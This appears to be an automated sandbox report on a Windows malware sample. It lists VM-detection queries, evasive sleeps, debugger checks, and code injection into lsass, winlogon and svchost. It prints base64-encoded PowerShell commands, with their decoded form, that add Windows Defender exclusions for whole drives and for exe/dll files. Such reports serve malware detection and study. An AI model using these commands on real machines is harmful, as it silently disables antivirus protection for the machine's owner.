Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972	Thread sleep time: -68000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 5547 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112	Thread sleep count: 3401 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep count: 5587 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772	Thread sleep count: 2582 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296	Thread sleep count: 989 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724	Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep count: 2928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep count: 272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828	Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828	Thread sleep time: -77000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912	Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368	Thread sleep count: 581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5547	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3401	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5587	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2582	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1048

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\lsass.exe	API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.2 %

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Install.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Roaming\34432.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C49
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,	1_2_00406873
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006E1C FindFirstFileExW,	22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400073C8 FindFirstFileExW,	39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,	42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,	44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,	47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,	49_2_000001B8BFF4D0E4

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

22_2_0000000140005D5C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_00000001400090E0 GetProcessHeap,

22_2_00000001400090E0

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\34432.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\34432.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_00000001400021B8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	22_2_00000001400021B8
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140002CF4 SetUnhandledExceptionFilter,	22_2_0000000140002CF4
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0000000140005D5C
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140002B10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0000000140002B10
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000235C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_000000014000235C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140002338 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	39_2_0000000140002338
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140002C90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000000140002C90
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400024DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000001400024DC
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000624C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_000000014000624C
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001AFDDD09098
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000001AFDDD08450
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001AFDDD0BEC8
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB8450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000240B2BB8450
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB9098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000240B2BB9098
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBBEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000240B2BBBEC8
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	47_2_000001CAF3D08450
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001CAF3D09098
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001CAF3D0BEC8
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF49098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_000001B8BFF49098
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF48450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	49_2_000001B8BFF48450
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_000001B8BFF4BEC8

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory allocated: C:\Windows\System32\nslookup.exe base: 140000000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 240B2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2C633850000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DDCD35D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: B2B835D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F3CD35D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BFF135D0

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4CF1008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14000E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001B000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001D000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140056000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 44EB131010	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14000E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140018000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14003F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: EE637B6010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 240B2B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2C633850000

.NET source code references suspicious native API functions

Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\34432.exe	Thread register set: target process: 7056			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2324

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
